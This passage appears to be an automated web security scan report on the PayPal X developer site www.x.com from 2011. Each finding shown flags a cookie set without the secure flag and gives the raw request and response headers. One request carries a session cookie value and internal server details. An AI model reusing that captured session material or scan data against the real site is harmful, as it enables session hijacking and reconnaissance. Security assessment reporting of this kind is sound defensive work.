JP: D=132206 t=1313157087884897
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.87. https://www.x.com/community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232363b31342c323030323b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363039373b33382c363133383b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:27 GMT; Path=/
Vary: User-Agent
JP: D=143677 t=1313157087084685
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.88. https://www.x.com/community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363133383b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=99334 t=1313157086694004
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.89. https://www.x.com/community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323232363b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=79734 t=1313157086409698
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.90. https://www.x.com/community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=108461 t=1313157085908464
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.91. https://www.x.com/community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323232363b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:25 GMT; Path=/
Vary: User-Agent
JP: D=96364 t=1313157085618096
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.92. https://www.x.com/docs/DOC-1031

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1031

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1031 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313033313b3130322c313337323b3130322c313035313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:48 GMT; Path=/
Vary: User-Agent
JP: D=96847 t=1313157228488141
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.93. https://www.x.com/docs/DOC-1041

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1041

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1041 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313333323b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:07 GMT; Path=/
Vary: User-Agent
JP: D=129414 t=1313157247469487
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.94. https://www.x.com/docs/DOC-1051

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1051

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1051 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313035313b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:48 GMT; Path=/
Vary: User-Agent
JP: D=159037 t=1313157228026431
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.95. https://www.x.com/docs/DOC-1106

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1106

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1106 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/button_manager
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c313130363b3130322c333831313b332c38383139383b332c3133383934323b332c38373839383b332c3134303532383b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b; Expires=Sun, 11-Sep-2011 13:40:10 GMT; Path=/
Vary: User-Agent
JP: D=139511 t=1313156410450395
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.96. https://www.x.com/docs/DOC-1108

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1108

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1108 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b3130322c333335323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:06 GMT; Path=/
Vary: User-Agent
JP: D=99860 t=1313157246030665
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.97. https://www.x.com/docs/DOC-1116

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1116

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1116 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:12 GMT; Path=/
Vary: User-Agent
JP: D=130471 t=1313157252790233
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.98. https://www.x.com/docs/DOC-1176

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1176

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1176 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313130363b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:15 GMT; Path=/
Vary: User-Agent
JP: D=129417 t=1313157255561975
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.99. https://www.x.com/docs/DOC-1204

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1204

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1204 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:13 GMT; Path=/
Vary: User-Agent
JP: D=312167 t=1313157253541541
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.100. https://www.x.com/docs/DOC-1216

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1216

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1216 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:12 GMT; Path=/
Vary: User-Agent
JP: D=91982 t=1313157252137257
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.101. https://www.x.com/docs/DOC-1332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1332

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1332 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313333323b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:06 GMT; Path=/
Vary: User-Agent
JP: D=140843 t=1313157246673403
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.102. https://www.x.com/docs/DOC-1372

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1372

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1372 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313337323b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:47 GMT; Path=/
Vary: User-Agent
JP: D=87320 t=1313157227528974
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.103. https://www.x.com/docs/DOC-1374

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1374

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1374 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:08 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313337343b3130322c313333323b3130322c313130383b3130322c313034313b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:08 GMT; Path=/
Vary: User-Agent
JP: D=92665 t=1313157248423211
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.104. https://www.x.com/docs/DOC-1401

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1401

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1401 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313430313b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313230343b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:14 GMT; Path=/
Vary: User-Agent
JP: D=292571 t=1313157254169391
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.105. https://www.x.com/docs/DOC-1431

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1431

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1431 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:08 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313433313b3130322c313333323b3130322c313337343b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:09 GMT; Path=/
Vary: User-Agent
JP: D=208093 t=1313157248979182
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.106. https://www.x.com/docs/DOC-1551

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1551

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1551 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
